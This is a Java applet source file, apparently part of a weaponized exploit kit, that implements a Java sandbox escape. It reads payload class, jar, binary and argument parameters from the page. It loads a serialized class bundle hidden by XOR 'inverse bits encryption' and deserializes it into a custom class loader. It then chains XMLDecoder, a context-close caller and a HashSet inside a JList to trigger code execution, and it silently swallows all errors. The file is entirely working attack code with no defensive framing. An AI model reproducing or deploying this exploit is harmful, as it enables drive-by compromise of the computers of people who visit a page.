weaponized/src-exploit/x/XAppletW.java
package x;
import java.beans.Expression;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.InputStream;
import java.io.ObjectInputStream;
import java.util.ArrayList;
import javax.swing.JApplet;
import javax.swing.JList;
import javax.swing.SwingUtilities;
@SuppressWarnings("all")
public class XAppletW extends JApplet {
private static final long serialVersionUID = 4268202609884012044L;
@Override
public void init() {
// Parsing arguments.
EP.pClass = getParameter("pClass");
EP.pJar = getParameter("pJar");
EP.pBin = getParameter("pBin");
int argCount = 1;
String arg;
ArrayList<String> args = new ArrayList<String>();
while( (arg=getParameter("pArg"+argCount++)) != null ) {
args.add(arg);
}
EP.pArgs = new String[args.size()];
args.toArray(EP.pArgs);
EP.docBase = this.getDocumentBase().toString();
// System.out.println("Hello "+ExploitParams.docBase);
//Execute a job on the event-dispatching thread; creating this applet's GUI.
try {
SwingUtilities.invokeAndWait(new Runnable() {
public void run() {
try {
byte[] bytes = new byte[4096];
InputStream in = XAppletW.class.getResourceAsStream("classes.ser");
ByteArrayOutputStream out = new ByteArrayOutputStream();
int bytesRead;
while( (bytesRead = in.read(bytes)) != -1) {
out.write(bytes, 0, bytesRead);
}
in.close();
bytes = out.toByteArray();
for( int i=0; i<bytes.length; i++ ) {
bytes[i] = (byte) (bytes[i] ^ 255); // "Inverse bits encryption": Enough to hide
}
ByteArrayInputStream bin = new ByteArrayInputStream(bytes);
ObjectInputStream oin = new ObjectInputStream(bin);
EC cl = (EC) oin.readObject();
//-------------------
in = XAppletW.class.getResourceAsStream("input.xml");
Object dec = new Expression(cl.getClass("x.MyXMLDecoder"),"new",new Object[] {in}).getValue();
Object iter = new Expression(cl.getClass("x.Context_close_Caller"),"create",new Object[] {dec}).getValue();
Object o = new Expression(cl.getClass("x.MyHashSet"),"new",new Object[] {iter}).getValue();
JList list = new JList();
list.setListData(new Object[] { o });
add(list);
} catch (Exception e) {
//e.printStackTrace();
}
}
});
} catch (Exception e) {
//e.printStackTrace();
}
}
}